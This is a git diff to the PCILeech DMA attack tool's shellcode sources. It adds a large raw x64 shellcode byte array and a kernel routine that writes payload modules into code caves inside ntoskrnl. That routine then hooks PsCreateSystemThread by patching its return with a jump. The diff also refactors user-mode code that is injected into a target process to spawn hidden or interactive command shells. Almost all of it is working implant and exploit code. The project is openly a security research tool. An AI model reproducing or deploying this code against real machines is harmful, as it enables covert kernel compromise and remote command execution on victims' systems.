+ 0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+ 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+ 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+ 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+ 0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+ 0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
+ 0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+ 0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+ 0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+ 0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+ 0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+ 0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+ 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+ 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+ 0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+ 0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+ 0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+ 0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+ 0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+ 0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+ 0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+ 0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+ 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+ 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+ 0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+ 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+ 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+ 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+ 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+ 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+ 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+ 0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+ 0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+ 0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+ 0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+ 0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+ 0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+ 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+ 0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+ 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+ 0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+ 0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+ 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+ 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+ 0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+ 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
+ 0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+ 0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+ 0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+ 0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+ 0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+ 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+ 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+ 0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+ 0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+ 0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+ 0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+ 0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+ 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+ 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+ 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+ 0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+ 0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+ 0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+ 0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+ 0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+ 0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+ 0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+ 0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+ 0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+ 0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+ 0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+ 0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+ 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+ 0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+ 0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+ 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+ 0xc4, 0x50, 0x5f, 0xc3
+ };
+ *ppb = WINX64_PSCMD_USER_BIN;
+ *pcb = sizeof(WINX64_PSCMD_USER_BIN);
+}
+
+// ----------------------------------------------------------------------------
+// CORE LOGIC/MASTER FUNCTIONALITY BELOW:
+// ----------------------------------------------------------------------------
+
+#define H_PsCreateSystemThread 0x94a06b02
+VOID c_EntryPoint(PKMDDATA pk)
+{
+ PBYTE pbData;
+ DWORD cbData;
+ QWORD hModuleNTOSKRNL, hPsCreateSystemThread, hHookFn, hHook;
+ QWORD hKMD, hVFS, hPSCMD_KERNEL, hPSCMD_USER;
+ DWORD dwOffsetRET = 0, dwOffsetJMP;
+ // locate ntoskrnl.exe
+ hModuleNTOSKRNL = FindNtoskrnl();
+ if(!hModuleNTOSKRNL) {
+ pk->dataOut[0] = 0xf0000001;
+ return;
+ }
+ pk->dataOut[1] = hModuleNTOSKRNL;
+ // locate hook function - PsCreateSystemThreadEx
+ hPsCreateSystemThread = PEGetProcAddressH(hModuleNTOSKRNL, H_PsCreateSystemThread);
+ if(!hPsCreateSystemThread) {
+ pk->dataOut[0] = 0xf0000002;
+ return;
+ }
+ hHookFn = hPsCreateSystemThread;
+ pk->dataOut[2] = hHookFn;
+ // hook : locate, but do not patch yet.
+ while(TRUE) {
+ if((*(PBYTE)(hHookFn + dwOffsetRET) == 0xC3 /* RET */) && (*(PDWORD)(hHookFn + dwOffsetRET + 1) == 0xCCCCCCCC /* PAD */)) {
+ break;
+ }
+ if(dwOffsetRET == 0x100) {
+ pk->dataOut[0] = 0xf0000003;
+ return;
+ }
+ dwOffsetRET++;
+ }
+ hHook = hHookFn + dwOffsetRET;
+ // code cave : locate and patch in VFS (virtual file system) module.
+ GetData_VFS(&pbData, &cbData);
+ hVFS = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hVFS) {
+ pk->dataOut[0] = 0xf0000004;
+ return;
+ }
+ pk->dataOut[3] = hVFS;
+ CopyMem((PVOID)hVFS, (PVOID)pbData, cbData);
+ // code cave : locate and patch in KMD (windows pcileech kernel module).
+ GetData_KMD(&pbData, &cbData);
+ hKMD = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hKMD) {
+ pk->dataOut[0] = 0xf0000005;
+ return;
+ }
+ pk->dataOut[4] = hKMD;
+ CopyMem((PVOID)hKMD, (PVOID)pbData, cbData);
+ // code cave : locate and patch in pscmd kernelmode code.
+ GetData_PSCMD_KERNEL(&pbData, &cbData);
+ hPSCMD_KERNEL = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hPSCMD_KERNEL) {
+ pk->dataOut[0] = 0xf0000006;
+ return;
+ }
+ pk->dataOut[5] = hPSCMD_KERNEL;
+ CopyMem((PVOID)hPSCMD_KERNEL, (PVOID)pbData, cbData);
+ // code cave : locate and patch in pscmd usermode code.
+ GetData_PSCMD_USER(&pbData, &cbData);
+ hPSCMD_USER = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hPSCMD_USER) {
+ pk->dataOut[0] = 0xf0000006;
+ return;
+ }
+ pk->dataOut[6] = hPSCMD_USER;
+ CopyMem((PVOID)hPSCMD_USER, (PVOID)pbData, cbData);
+ // patch in offsets in KMD code
+ *(PWORD)(hKMD + 0x02) = pk->dataIn[0] ? (WORD)pk->dataIn[0] : 0x0045;
+ *(PDWORD)(hKMD + 0x04) = (DWORD)hModuleNTOSKRNL;
+ *(PDWORD)(hKMD + 0x08) = (DWORD)hKMD;
+ *(PDWORD)(hKMD + 0x0C) = (DWORD)hVFS;
+ *(PDWORD)(hKMD + 0x10) = (DWORD)hPSCMD_KERNEL;
+ *(PDWORD)(hKMD + 0x14) = (DWORD)hPSCMD_USER;
+ // hook function by patching RET instruction
+ dwOffsetJMP = (DWORD)hKMD - ((DWORD)hHook + 5);
+ *(PBYTE)(hHook) = 0xE9; // JMP
+ *(PDWORD)(hHook + 1) = dwOffsetJMP; // JMP ADDR
+}
diff --git a/pcileech_shellcode/wx64_common.c b/pcileech_shellcode/wx64_common.c
index 39eacc2..5ab0e57 100644
--- a/pcileech_shellcode/wx64_common.c
+++ b/pcileech_shellcode/wx64_common.c
@@ -1,7 +1,7 @@
// wx64_common.c : support functions used by Windows x64 KMDs started by stage3 EXEC.
// Compatible with Windows x64.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
@@ -70,36 +70,35 @@ QWORD KernelGetModuleBase(_In_ PKERNEL_FUNCTIONS fnk, _In_ LPSTR szModuleName)
VOID InitializeKernelFunctions(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS fnk)
{
- QWORD FUNC2[][2] = {
- { &fnk->_stricmp, H__stricmp },
- { &fnk->ExAllocatePool, H_ExAllocatePool },
- { &fnk->ExFreePool, H_ExFreePool },
- { &fnk->IoCreateDriver, H_IoCreateDriver },
- { &fnk->KeDelayExecutionThread, H_KeDelayExecutionThread },
- { &fnk->KeGetCurrentIrql, H_KeGetCurrentIrql },
- { &fnk->MmGetPhysicalAddress, H_MmGetPhysicalAddress },
- { &fnk->MmLoadSystemImage, H_MmLoadSystemImage },
- { &fnk->MmMapIoSpace, H_MmMapIoSpace },
- { &fnk->MmUnloadSystemImage, H_MmUnloadSystemImage },
- { &fnk->MmUnmapIoSpace, H_MmUnmapIoSpace },
- { &fnk->RtlAnsiStringToUnicodeString, H_RtlAnsiStringToUnicodeString },
- { &fnk->RtlCopyMemory, H_RtlCopyMemory },
- { &fnk->RtlFreeUnicodeString, H_RtlFreeUnicodeString },
- { &fnk->RtlInitAnsiString, H_RtlInitAnsiString },
- { &fnk->RtlInitUnicodeString, H_RtlInitUnicodeString },
- { &fnk->RtlInitUnicodeString, H_RtlInitUnicodeString },
- { &fnk->RtlZeroMemory, H_RtlZeroMemory },
- { &fnk->ZwClose, H_ZwClose },
- { &fnk->ZwCreateFile, H_ZwCreateFile },
- { &fnk->ZwOpenFile, H_ZwOpenFile },
- { &fnk->ZwReadFile, H_ZwReadFile },
- { &fnk->ZwQueryDirectoryFile, H_ZwQueryDirectoryFile },
- { &fnk->ZwQuerySystemInformation, H_ZwQuerySystemInformation },
- { &fnk->ZwSetSystemInformation, H_ZwSetSystemInformation },
- { &fnk->ZwWriteFile, H_ZwWriteFile }
- };
- for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
- *(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
+ DWORD i = 0, NAMES[25];
+ NAMES[i++] = H__stricmp;
+ NAMES[i++] = H_ExAllocatePool;
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_IoCreateDriver;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ NAMES[i++] = H_KeGetCurrentIrql;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmLoadSystemImage;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnloadSystemImage;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_RtlAnsiStringToUnicodeString;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_RtlFreeUnicodeString;
+ NAMES[i++] = H_RtlInitAnsiString;
+ NAMES[i++] = H_RtlInitUnicodeString;
+ NAMES[i++] = H_RtlZeroMemory;
+ NAMES[i++] = H_ZwClose;
+ NAMES[i++] = H_ZwCreateFile;
+ NAMES[i++] = H_ZwOpenFile;
+ NAMES[i++] = H_ZwQueryDirectoryFile;
+ NAMES[i++] = H_ZwQuerySystemInformation;
+ NAMES[i++] = H_ZwSetSystemInformation;
+ NAMES[i++] = H_ZwReadFile;
+ NAMES[i++] = H_ZwWriteFile;
+ while(i) {
+ i--;
+ *((PQWORD)fnk + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
}
}
diff --git a/pcileech_shellcode/wx64_common.h b/pcileech_shellcode/wx64_common.h
index 462c713..5ba34b8 100644
--- a/pcileech_shellcode/wx64_common.h
+++ b/pcileech_shellcode/wx64_common.h
@@ -29,30 +29,30 @@ typedef struct _ETHREAD *PETHREAD;
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
@@ -281,6 +281,11 @@ typedef struct tdKERNEL_FUNCTIONS {
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength);
+ NTSTATUS(*ZwSetSystemInformation)(
+ _In_ QWORD SystemInformationClass,
+ _In_ PVOID SystemInformation,
+ _In_ ULONG SystemInformationLength
+ );
NTSTATUS(*ZwReadFile)(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
@@ -292,11 +297,6 @@ typedef struct tdKERNEL_FUNCTIONS {
_In_opt_ PQWORD ByteOffset,
_In_opt_ PULONG Key
);
- NTSTATUS(*ZwSetSystemInformation)(
- _In_ QWORD SystemInformationClass,
- _In_ PVOID SystemInformation,
- _In_ ULONG SystemInformationLength
- );
NTSTATUS(*ZwWriteFile)(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
diff --git a/pcileech_shellcode/wx64_exec_user_c.c b/pcileech_shellcode/wx64_exec_user_c.c
index 3f61997..d5a45dd 100644
--- a/pcileech_shellcode/wx64_exec_user_c.c
+++ b/pcileech_shellcode/wx64_exec_user_c.c
@@ -1,6 +1,6 @@
// wx64_exec_user_c.c : usermode code to be injected into user process to spawn new processes.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
// compile with:
@@ -52,9 +52,7 @@ typedef struct tdUserShellConfig {
#define H_CreateProcessA 0x16b3fe72
#define H_CreateThread 0xca2bd06b
#define H_GetExitCodeProcess 0xac30ab74
-#define H_GetLastError 0x75da1966
#define H_LocalAlloc 0x4c0297fa
-#define H_LocalFree 0x5cbaeaf6
#define H_ReadFile 0x10fa6516
#define H_Sleep 0xdb2d49b0
#define H_WriteFile 0xe80a791f
@@ -93,14 +91,10 @@ typedef struct tdUserShellFunctions {
_In_ HANDLE hProcess,
_Out_ LPDWORD lpExitCode
);
- DWORD(*GetLastError)(void);
HLOCAL(*LocalAlloc)(
_In_ UINT uFlags,
_In_ SIZE_T uBytes
);
- HLOCAL(*LocalFree)(
- _In_ HLOCAL hMem
- );
BOOL(*ReadFile)(
_In_ HANDLE hFile,
_Out_ LPVOID lpBuffer,
@@ -171,17 +165,20 @@ PVOID PEGetProcAddressH(_In_ HMODULE hModuleIn, _In_ DWORD dwProcNameH)
VOID UserShellInitializeFunctions(_In_ HMODULE hModuleKernel32, _Out_ PUSERSHELL_FUNCTIONS fnu)
{
- fnu->CloseHandle = PEGetProcAddressH(hModuleKernel32, H_CloseHandle);
- fnu->CreatePipe = PEGetProcAddressH(hModuleKernel32, H_CreatePipe);
- fnu->CreateProcessA = PEGetProcAddressH(hModuleKernel32, H_CreateProcessA);
- fnu->CreateThread = PEGetProcAddressH(hModuleKernel32, H_CreateThread);
- fnu->GetExitCodeProcess = PEGetProcAddressH(hModuleKernel32, H_GetExitCodeProcess);
- fnu->GetLastError = PEGetProcAddressH(hModuleKernel32, H_GetLastError);
- fnu->LocalAlloc = PEGetProcAddressH(hModuleKernel32, H_LocalAlloc);
- fnu->LocalFree = PEGetProcAddressH(hModuleKernel32, H_LocalFree);
- fnu->ReadFile = PEGetProcAddressH(hModuleKernel32, H_ReadFile);
- fnu->Sleep = PEGetProcAddressH(hModuleKernel32, H_Sleep);
- fnu->WriteFile = PEGetProcAddressH(hModuleKernel32, H_WriteFile);
+ DWORD i = 0, NAMES[9];
+ NAMES[i++] = H_CloseHandle;
+ NAMES[i++] = H_CreatePipe;
+ NAMES[i++] = H_CreateProcessA;
+ NAMES[i++] = H_CreateThread;
+ NAMES[i++] = H_GetExitCodeProcess;
+ NAMES[i++] = H_LocalAlloc;
+ NAMES[i++] = H_ReadFile;
+ NAMES[i++] = H_Sleep;
+ NAMES[i++] = H_WriteFile;
+ while(i) {
+ i--;
+ *((PQWORD)fnu + i) = (QWORD)PEGetProcAddressH(hModuleKernel32, NAMES[i]);
+ }
}
BOOL UserShellIsProcessRunning(PUSERSHELL_DATA pd)
@@ -221,14 +218,12 @@ BOOL UserShellExec(_Inout_ PUSERSHELL_DATA pd)
}
// launch executable
if(!pd->fnu.CreateProcessA(NULL, pd->pCfg->szProcToStart, NULL, NULL, TRUE, pd->pCfg->fCreateProcess, NULL, NULL, psi, &pi)) {
- pd->fnu.LocalFree(psi);
return FALSE;
}
pd->hProcessHandle = pi.hProcess;
if(pd->pCfg->qwAddrConsoleBuffer) {
pd->fnu.CloseHandle(pi.hThread);
}
- pd->fnu.LocalFree(psi);
return TRUE;
}
@@ -309,7 +304,6 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
// create process
if(!UserShellExec(pd)) {
UserShellCleanup(pd);
- pd->fnu.LocalFree(pd);
return;
}
// Initalize console redirection #2/2
@@ -317,4 +311,4 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
pd->fnu.CreateThread(NULL, 0, &UserShellThreadWriter, pd, 0, NULL);
pd->fnu.CreateThread(NULL, 0, &UserShellThreadReader, pd, 0, NULL);
}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/wx64_pscreate.c b/pcileech_shellcode/wx64_pscreate.c
index b567e1e..f7e2a2d 100644
--- a/pcileech_shellcode/wx64_pscreate.c
+++ b/pcileech_shellcode/wx64_pscreate.c
@@ -6,19 +6,19 @@
//
// compile with (wx64_pscreate):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscreate.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscreate.exe "PROCESS CREATOR - SPAWN NEW PROCESSES ON TARGET! \n===============================================================\nREQUIRED OPTIONS: \n -s : Executable path including command line options. \n Example: '-s c:\windows\system32\cmd.exe'. \n -0 : Parent process PID to start new process from. \n Example '-0 0x0fe0'. \nOPTIONAL OPTIONS: \n -1 : CreateProcess creation flags (dwCreationFlags) as \n specified on MSDN. Hidden Window = 0x08000000 \n -2 : Redirect input - use to spawn interactive shell. \n Example: 0x01 \n -3 : Timeout in seconds. Default: 60. \n -4 : Boost (Windows 7 only): higher success ratio, but \n parent process may crash. Example 1. Default 0. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT =====%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n===============================================================\n"
//
// ALTERNATIVELY (wx64_pscmd):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
